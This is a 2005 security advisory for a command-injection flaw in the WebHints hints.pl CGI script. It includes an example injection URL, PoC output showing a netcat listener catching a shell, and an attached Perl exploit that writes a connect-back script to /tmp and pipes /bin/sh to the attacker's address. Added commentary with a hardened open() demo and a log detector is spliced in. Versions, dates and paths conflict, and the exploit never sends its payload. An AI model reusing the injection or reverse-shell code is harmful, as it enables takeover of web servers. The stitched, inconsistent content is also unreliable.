
MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability



Emanuele "MadSheep" Gentili
15/06/05, 20:45

MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability

06/11/2005

Published: 06 11 2005

Released: 06 11 2005

Name: WebHints

Affected Systems: <= 1.03

Issue: Remote Command Execution Vulnerability

Author: Emanuele "MadSheep" Gentili

Vendor: http://awsd.com/scripts/





Description

***********
Madroot Security Group has discovered a flaw in WebHints <= 1.02. There is a vulnerability in the current version of WebHints. The issue is caused by insufficient sanitization of externally supplied data passed to the hints.pl script, which allows a remote user to supply an arbitrary shell command that the script then executes. An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
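The advisory does not show hints.pl's own code, so the following is an added illustration (my code, not WebHints' and not the author's) of the vulnerability class that a "|command|" or "command|" request parameter targets in Perl CGI scripts: the two-argument open(), which lets the supplied data choose whether a string is a filename or a command to run. The hints/ directory, the file name and the two function names are constructed for the demonstration; the hardened variant shows the allow-list plus three-argument open() that closes the hole.

```perl
#!/usr/bin/perl
# Added illustration, not WebHints code: a CGI-style "read a hint file by
# name" routine written with two-argument open() (vulnerable) and with an
# allow-list plus three-argument open() (hardened). All paths and inputs
# below are constructed for the example.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Throwaway hints/ directory so both routines have a real file to read.
my $work      = tempdir(CLEANUP => 1);
my $hints_dir = "$work/hints";
mkdir $hints_dir or die "mkdir $hints_dir: $!";
open(my $out, '>', "$hints_dir/welcome") or die "create: $!";
print $out "Hint: save your work often.\n";
close $out;

# Constructed parameter values as a script would see them after URL decoding.
my $benign   = 'welcome';
my $injected = 'welcome; echo INJECTED|';   # trailing '|' = "run this, read its output"

# VULNERABLE: two-argument open() interprets the string itself. A value that
# ends in '|' is handed to /bin/sh as a command line and its stdout is what
# the caller reads, so the "hint" returned here is the command's output.
sub read_hint_unsafe {
    my ($name) = @_;
    open(my $fh, "$hints_dir/$name") or return "open failed: $!\n";
    local $/;                     # slurp the whole "file"
    my $data = <$fh>;
    close $fh;
    return defined $data ? $data : '';
}

# HARDENED: allow-list the name, build the path without interpolating the
# raw value into a mode-bearing string, and use three-argument open() with an
# explicit '<' mode so the name can never be read as a command or mode prefix.
sub read_hint_safe {
    my ($name) = @_;
    return "rejected: bad hint name\n"
        unless defined $name && $name =~ /\A[A-Za-z0-9_-]{1,64}\z/;
    my $path = File::Spec->catfile($hints_dir, $name);
    open(my $fh, '<', $path) or return "open failed: $!\n";
    local $/;
    my $data = <$fh>;
    close $fh;
    return defined $data ? $data : '';
}

print "vulnerable, benign  : ", read_hint_unsafe($benign);
print "vulnerable, injected: ", read_hint_unsafe($injected);   # output of the injected echo
print "hardened,   benign  : ", read_hint_safe($benign);
print "hardened,   injected: ", read_hint_safe($injected);
```

Running it shows the vulnerable routine returning the injected command's output (the shell also complains on stderr that the hint file is not executable, which is the shell actually running the string), while the hardened routine rejects the same value before any file or command is touched. The allow-list is the important part: three-argument open() alone stops the pipe trick, but a name such as "../../etc/passwd" would still be read, which is why both measures are applied together.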



Details

*******


It's possible for a remote attacker to retrieve any file from a web server and execute it. Multiple files are affected by this problem.

For example try this:

http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd|
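For the operator of an affected host, the request above is what leaves a trace. The following is an added detection example (my code, not part of the advisory) that scans access-log lines for that pattern: a query string to a Perl CGI wrapped in pipe characters or carrying shell metacharacters, and the fixed User-Agent string "madsheep" that the PoC script attached to this post sends. It assumes Apache Combined Log Format; the log lines and addresses are constructed.

```perl
#!/usr/bin/perl
# Added detection example, not from the advisory: flag access-log entries that
# match the request shape described above. Sample lines are constructed and
# use documentation address ranges.
use strict;
use warnings;

my @sample_log = (
    '192.0.2.10 - - [11/Jun/2005:20:45:01 +0200] "GET /cgi-bin/hints.pl?welcome HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Jun/2005:20:46:13 +0200] "GET /cgi-bin/hints.pl?|uname%20-a;id;uptime;pwd| HTTP/1.1" 200 233 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Jun/2005:20:47:30 +0200] "POST /cgi-bin/ HTTP/1.1" 404 0 "-" "madsheep"',
    '192.0.2.11 - - [11/Jun/2005:20:48:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
);

# Combined Log Format: client ident user [time] "method target protocol" status size "referer" "user-agent"
my $log_re = qr/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/;

# Minimal URL decoding so encoded payloads (%20, %7C) are inspected decoded.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Returns nothing for a benign line, or a hashref describing why it is suspicious.
sub classify {
    my ($line) = @_;
    my ($ip, $ts, $method, $target, $status, $ua) = $line =~ $log_re or return;
    my ($path, $query) = split /\?/, $target, 2;
    $query = defined $query ? url_decode($query) : '';
    my $is_perl_cgi = $path =~ /\.(?:pl|cgi)\z/;

    my @reasons;
    # Perl's two-argument open() treats a leading or trailing '|' as "run this".
    push @reasons, 'pipe-wrapped query to a Perl CGI (open() pipe form)'
        if $is_perl_cgi && ($query =~ /\A\|/ || $query =~ /\|\z/);
    # Command chaining and command substitution characters in the query.
    push @reasons, 'shell metacharacters in query'
        if $is_perl_cgi && $query =~ /[;`]/;
    # The PoC attached to this post sends a fixed User-Agent header.
    push @reasons, 'User-Agent matches the published PoC ("madsheep")'
        if $ua eq 'madsheep';

    return unless @reasons;
    return {
        ip      => $ip,
        time    => $ts,
        method  => $method,
        status  => $status,
        request => length($query) ? "$path?$query" : $path,
        reasons => \@reasons,
    };
}

my $hits = 0;
for my $line (@sample_log) {
    my $hit = classify($line) or next;
    $hits++;
    printf "%s  %-13s %s %s -> %s\n",
        $hit->{time}, $hit->{ip}, $hit->{method}, $hit->{request},
        join('; ', @{ $hit->{reasons} });
}
printf "%d of %d lines flagged\n", $hits, scalar @sample_log;
```

On the constructed input the second and third lines are flagged (the pipe-wrapped query and the PoC's User-Agent), the benign hints.pl request and the static page are not. In practice the pipe and metacharacter rules are the durable ones; a User-Agent string is trivially changed and is only worth matching because this particular PoC hard-codes it.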


PoC

*******


Exploit: http://madsheep.altervista.org/M4DR007-hints.pl


emanuele@blackbox:~$ perl new.pl


~~ www.madroot.edu.ms Security Group ~~

WebHints Software hints.cgi
Remote Command Execution Vulnerability
Affected version: <= all
~~ code by MadSheep ~~


06.11.2005


hostname:
localhost
port: (default: 80)
80
path: (/cgi-bin/)
/cgi-bin/
your ip (for reverse connect):
127.0.0.1
your port (for reverse connect):
7350


~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
try to exploiting...
OK!
NOW, run in your box: nc -l -vv -p 7350
starting connect back on 127.0.0.1 :7350
DONE!
Look netcat windows and funny

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WARNING - WARNING - WARNING - WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

If connect back shell not found:
- you do not have privileges to write in /tmp
- Shell not vulnerable


We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk


emanuele@blackbox:~$


emanuele@blackbox:~$ nc -l -vv -p 7350

uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep)



enJoy

Solution

*********

The vendor has been contacted and a patch was not yet produced.





Credits
*******

Emanuele "MadSheep" Gentili - emanuele@orvietolug.org - www.madsheep.edu.ms

Come cheer us at #madroot on Freenode ( irc.freenode.net )

(C) 2004 Copyright by madroot Security Group


[Attachment: M4DR007-hints.pl]

#!/usr/bin/perl
#
#emanuele@blackbox:~$ perl M4DR007-hints.pl
#
# ~~ www.madroot.edu.ms Security Group ~~
#
# WebHints Software hints.perl
# Remote Command Execution Vulnerability
# Affected version: 1.3
# ~~ code by MadSheep ~~
#
# 06.11.2005
#
#hostname:
#localhost
#port: (default: 80)
#80
#path: (/cgi-bin/)
#/cgi-bin/
#your ip (for reverse connect):
#127.0.0.1
#your port (for reverse connect):
#7350
#
#~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
# try to exploiting...
# OK!
# NOW, run in your box: nc -l -vv -p 7350
# starting connect back on 127.0.0.1 :7350
# DONE!
# Look netcat windows and funny
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#If connect back shell not found:
#- you do not have privileges to write in /tmp
#- Shell not vulnerable
#
#We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk
#
#emanuele@blackbox:~$
#
#emanuele@blackbox:~$ nc -l -vv -p 7350
#
# uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep)
#
# Come cheer us at #madroot on Freenode ( irc.freenode.net )
#
# (C) 2005 Copyright by madroot Security Group
#
#############################################
use strict;
use warnings;
use IO::Socket;

print "\n\n ~~ www.madroot.edu.ms Security Group ~~ \n\n";
print " WebHints Software hints.pl\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <= 1.3 \n";
print " ~~ code by MadSheep ~~\n\n\n";
print " 06.11.2005\n\n\n";

# Interactive parameters: target host, port and CGI path, plus the address
# and port of the listener the connect-back script should call home to.
print "hostname: \n";
chomp(my $server = <STDIN>);

print "port: (default: 80)\n";
chomp(my $port = <STDIN>);
$port = 80 if ($port =~ /\D/);
$port = 80 if ($port eq "");

print "path: (/cgi-bin/ecart/)\n";
chomp(my $path = <STDIN>);

print "your ip (for reverse connect): \n";
chomp(my $ip = <STDIN>);

print "your port (for reverse connect): \n";
chomp(my $reverse = <STDIN>);

print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";

print " try to exploiting...\n";

# The connect-back script that the injected command appends to /tmp/cbs.pl on
# the target. q{} keeps its $variables uninterpolated; the pieces are
# concatenated so the resulting one-line string is unchanged from the original.
my $connect_back =
      q{use Socket;}
    . q{$execute='echo "`uname -a`";echo "`id`";/bin/sh';}
    . q{$target=$ARGV[0];$port=$ARGV[1];}
    . q{$iaddr=inet_aton($target) || die("Error: $!\n");}
    . q{$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");}
    . q{$proto=getprotobyname('tcp');}
    . q{socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");}
    . q{connect(SOCKET, $paddr) || die("Error: $!\n");}
    . q{open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");}
    . q{system($execute);close(STDIN)};

# Request target in the same "|command|" form as the advisory's example URL.
my $string = "/$path/hints.pl?|cd /tmp;echo " . $connect_back . " >>cbs.pl;perl cbs.pl $ip $reverse|";

print " OK! \n";
print " NOW, run in your box: nc -l -vv -p $reverse\n";
print " starting connect back on $ip :$reverse\n";
print " DONE!\n";
print " Look netcat windows and funny\n\n";

my $socket = IO::Socket::INET->new(
    PeerAddr => $server,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "connect to $server:$port failed: $@\n";

# Raw HTTP request as posted: it targets $path only, with an empty body, and
# $string built above is never written to the socket.
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: madsheep\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n\n";

[Attachment MADSHEEP-05SA-hints.txt: a second copy of the advisory text above]